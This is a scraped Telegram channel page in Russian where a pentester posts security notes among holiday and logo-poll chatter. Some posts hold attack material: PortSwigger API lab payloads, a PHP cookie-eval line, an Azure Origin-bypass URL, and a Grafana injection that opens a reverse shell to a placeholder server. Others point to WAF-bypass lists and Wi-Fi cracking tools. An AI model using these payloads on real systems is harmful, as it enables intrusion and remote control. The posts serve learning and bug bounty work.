en
Feedback
#Arm1tage

#Arm1tage

Open in Telegram

Разные заметки, инструменты, новости и прочее из мира и моего опыта в Кибербезопасности. В общем "Пентест без мОразма"© 🇺🇦🇺🇦🇺🇦

Show more
1 477
Subscribers
No data24 hours
No data7 days
No data30 days
Posts Archive
Тестируем Wi-Fi Начнем новый год с изучения новых навыков. Начнем с Ви-Фи, так как тут нет совершенно ничего сложного, зато д
Тестируем Wi-Fi Начнем новый год с изучения новых навыков. Начнем с Ви-Фи, так как тут нет совершенно ничего сложного, зато дополнительный плюсик в вашем резюме будет очень даже кстати. Нашел крутую методичку на хабре, где автор рассказывает про основные подходы к тестированию беспроводных сетей, а именно: Атаки: - Перехват WPA/WPA2 Handshake и дальнейший брут + атака на PMKID - ARP Request Replay атака на WEP - WPS Pin и Pixie Dust - Атаки на WPA/WPA2-Enterprise (RADIUS) - Атаки социальной инженерии (Evil Twin, Captive Portal) Инструменты: - Семейство airmon-ng инструментов - reaver - wifite - wifiphisher И другие Правда у этого всего есть одно важное условние. Если вы планируете проводить тестирование используя виртуальную машину, вам придется докупать внешний Wi-Fi модуль (например от Alfa Networks). В методичке расписаны популярные адаптеры, что может помочь в выборе модели. В ином случае используем, например, тот-же кали как основную машину или ставим её на флешку. Ссылка на методичку #wifi

Желаю, чтобы все дерьмо осталось в 2023 и 2024 приблизил длинную взлётную полосу вашего самолета в концу и вы достигли желаемого. С праздником!

С нг, мужики🤘

Нужно хоть немного радости под конец года принести народу. Год и так не сахар, хоть закончим на мажорной ноте.

за что клоунов и какашек то, джентльмены?

Ну че, уважаемые, уже приготовили оливье? Ёлку нарядили? Мандаринами вкинулись и погнали?
Ну че, уважаемые, уже приготовили оливье? Ёлку нарядили? Мандаринами вкинулись и погнали?

С наступающим

Полезное Чувак собрал большой список обходов WAF, найденных багхантерами в твиттере. В список входят такие файрволлы, как: Im
Полезное Чувак собрал большой список обходов WAF, найденных багхантерами в твиттере. В список входят такие файрволлы, как: Imperva, Akamai, F5, Checkpoint, Fortinet и другие. https://github.com/waf-bypass-maker/waf-community-bypasses/tree/main #waf

По итогам вышел самый лаконичный вариант. Мне понравился концепт использовать букву как лого а полную вариацию (4 вариант) как для всяких постов и тп. Благодарность за участие, уважаемые господа.

А ну и подрубил комменты, авось у кого какие мысли есть не только по поводу аватарки но контента на канале вцелом. Может кто-то хочет что-то порекомендовать, добавить, изменить и тп. Дерзайте.

Какой вариант лучше?
Anonymous voting

Уважаемые господа, желаю доброго вечера. Я хотел создать из этого канала что-то такое-эдакое запоминающееся и существенно отл
Уважаемые господа, желаю доброго вечера. Я хотел создать из этого канала что-то такое-эдакое запоминающееся и существенно отличающееся от миллиона остальных пабликов по кибербезу. Мне лично нравится все, что связано с этим каналом: название, контент и аудитория. Все, кроме аватарки. Нет, сама по себе она крутая, закладывает в себя изначальный концепт канала - уютное место, где я выступаю в роли пацана, который погружается в мир кибербеза. Но время идет и пора признать, что мы уже далеко не пацаны а ебейшие и прожжённые пентестеры. Потому я решил всерьез заняться ебейшим логотипом/картинкой для канала и запросил помощи у своего самого крутого дизайнера, которого я знаю (это тот самый человек, в котором я уверен, что его невозможно будет заменить ИИ). Я не имел конкретной идеи, и выступал в роли типичного заказчика: "ну я ниняю я хачу вот так, а так ни хачу". В итоге дизайнер провел психологический анализ автора и собрав все компоненты и составляющие канала были разработаны пару концептов, которые поразили меня до глубины души (на то он блять и дизайнер). В общем мне понравились все варианты и я решил дать окончательный вердикт своим подписчикам. Все таки наш общий канал, хули. Так что дерзайте (кстати за то, что текст может не поместиться в круглую рамочку аватарки не переживайте, мы подстроим фотку под круг).

API Labs На моей нелюбимой платформе SwiggerPort, не выкатили новые лабки по АПИ (я кстати не делал эти лабки, нет). А это зн
API Labs На моей нелюбимой платформе SwiggerPort, не выкатили новые лабки по АПИ (я кстати не делал эти лабки, нет). А это значит, что не выходит и новый пост на не моём паблике (я кстати не админ этого паблика, нет). Суть этого раздела дать тебе понять, что фаззить, сука, надо. И надо это делать красиво. А чтобы и ты мог делать это красиво, можешь использовать вот этот лист с параметрами для фаззинга. 🤨1. Exploiting an API endpoint using documentation
GET /api/
DELETE /api/user/carlos
🤨2. Exploiting server-side parameter pollution in a query string Находим forgotPassword.js файл и выясняем, что есть параметр reset-token. Теперь создаем POST /forgot-password запрос с %26 символом (означает, что он декодируется в & на серверной части) и фаззим (например через интрудер) параметр, там где $$:
csrf={ваш_csrf}&username=administrator%26$$
В итоге с помощью фаззинга находим параметр field. Вспоминаем, что мы нашли в жс коде ранее параметр ресет-токен и составляем финальный вид:
csrf={ваш_csrf}&username=administrator%26field=reset_token
Таким образом вы говорите серверу (из-за parameter pollution) выдать вам ресет токен пользователя администратор. 🤨3. Finding and exploiting an unused API endpoint Меняем GET на PATCH:
PATCH /api/products/1/price

{
"price":0
}
🤨4. Exploiting a mass assignment vulnerability Ищем параметры в ответе сервера: GET /api/checkout
"chosen_discount":{"percentage":0}
Теперь создаем POST /api/checkout реквест с найденным ранее параметром. Изменяем значение percentage на 100 (типа 100% скидка понял да):
{"chosen_products":[{"product_id":"1","quantity":1}],
"chosen_discount":{"percentage":100}}
#portswigger #api

Сегодня-завтра пост про то, что любит каждый подписчик армитража...🤌

Мысли в слух Автор соскреб пару шекелей с завтраков и купил себе премиум (как же я ненавижу этот ебучий капиталистический мир, где все имеет подписку. Чекайте, скоро епл прознает, что выгоднее будет не продавать телефон а давать на него подписку). В первую же очередь пошел смотреть как вывести в топ 10 всех телеграмм каналов свой канал и въебенил в него все бусты. Дополнительно могу сказать, что павел дуров гандонище, ведь для того, чтобы повысить уровень своего канала на 1 уровень мне нужно было 5 бустов, а у меня было всего 4. Потому с помощью моего ебейшего кореша я смог достичь 1 уровня своего канала. Зачем я все это делал? А затем, что я провожу реформу смайликов. Как же меня заебал 👍 смайлик, я его терпеть не могу. Потому я его заменю на 🤘, так будет интереснее. Остальные оставлю. Такие пироги. Всем спасибо все свободны.

Remote Code Execution | Command Injection RCE сложная и проворная уязвимость, которую хер так просто найдешь при багбаунти ил
Remote Code Execution | Command Injection RCE сложная и проворная уязвимость, которую хер так просто найдешь при багбаунти или АпСеке. Попался на глаза вот такой ролик, где чувак рассказывает про случаи инъекций команд, в каких местах они вызываются и как находятся. Я решил просто расписать коротко каждый случай из видео с прикрепленным к нему статьей/РоС-ом, чтобы не долбаться каждый раз и не пересматривать видос. 1. Сложная RCE через миграцию GitLab репозиториев с одного инстанса на другой. РоС. 2. /.git/config раскрывает ключ, который можно использовать для выполнения команд на сервере. Статья. 3. Выполнение команд прямо через куки на сервере с PHP (Статья): {$_COOKIE['c'] .= ';';eval($_COOKIE['c']);exit;} 4. Сервер на Руби при фаззинге параметров выдает ошибку через Rack и палит секрет для подписи куки. С помощью этого секрета создаем свой сериализованный объект с РЦЕ внутри. Статья. 5. RCE через CSRF на ажур, с интересным обходом проверки Origin (Статья): https://<my-webapp>.scm.azurewebsites.net._.<attacker-site>./ 6. Классическая SSTI на uber через имя профиля с отрабатыванием кода в письме. PoC. 7. RCE через SQL инъекцию. PoC. 8. Dependency Confusion. Об этом типе атак я делал пост ранее. 9. 0day уязвимости: Secure VPN. 10. RCE через картинки: ExifTool. 11. RCE через инъекцию опций в git. 12. Инъекция в параметр СМТП сервера на Grafana. РоС. "password": "x\r\n[plugin.grafana-image-renderer]\r\nrendering_args=--renderer-cmd-prefix=bash -c bash$IFS-l$IFS>$IFS/dev/tcp/SERVER_IP/4444$IFS0<&1$IFS2>&1" 13. Классический RCE через SSRF через Gopher. Статья. 14 Потенциальная RCE через генерацию PDF файлов с использованием headless Chromium. Репорт. #rce

А у нас тут, оказывается, собралась в общей сложности целая тысяча пенистестеров. Расчехляйте водяру господа, пора нам всем п
А у нас тут, оказывается, собралась в общей сложности целая тысяча пенистестеров. Расчехляйте водяру господа, пора нам всем протестировать длительность алкогольного делирия, знаете ли. Благодарность за вашу активность под постами, когда я очередной раз вижу клоуна или огонек, внутри меня что-то загорается, так и хочется продолжать бурпить мемные посты с шутками про пенисы и турбо-интрудер, которые никак не будут похожи на пресный контент в других пабликах. Карочи спс (вот да епты бла, вот такое поздравление).

Заебись. Прикупил себе адаптер от альфы (автор очень хотел пофлексить) и пошел заострять свои знания по взлому ВиФи сетей. Я
Заебись. Прикупил себе адаптер от альфы (автор очень хотел пофлексить) и пошел заострять свои знания по взлому ВиФи сетей. Я весь такой из себя хакер-хуякер поставил пароль 32 символа на вайфай сеть, выключил всякие там надстройки и изменил дефолтный пароль на админ панели с вычурным ебалом смотрел на себя в зеркало и говорил:"Ну крут, бля". Пошел значится я по классной методичке по пентесту вифи (об этом сделаю пост позже) проверять че там у меня по домашней сети. Каково было моё удивление, когда я внезапно обнаружил смачный такой кал в своих шароварах, когда первая же атака из методички (даже сам автор сказал шо шансы малы на такую атаку, да, да проверяй епты) прояснила мою больную голову, что я та еще лалка, потому что мой базированный гигачад шлёпа пароль был взломан за 2(!!!) секунды!! Вывод: вырубай ты этот WPS к ебеням братан.

Обнаруживаем и Обходим WAF Отличный инструмент для обнаружения Web Application Firewall. Содержит проверки для 88 различных в
Обнаруживаем и Обходим WAF Отличный инструмент для обнаружения Web Application Firewall. Содержит проверки для 88 различных веб-файрволлов, таких как: CloudFlare, Imperva, BIG-IP, FortiWeb и других. Так же предоставляет возможность обхода обнаруженной защиты посредством 30+ встроенных методов тамперинга или с помощью вашего листа с полезными нагрузками. Пример использования:
whatwaf -u http://kek.com --ra -t 10
https://github.com/Ekultek/WhatWaf #waf #cloudflare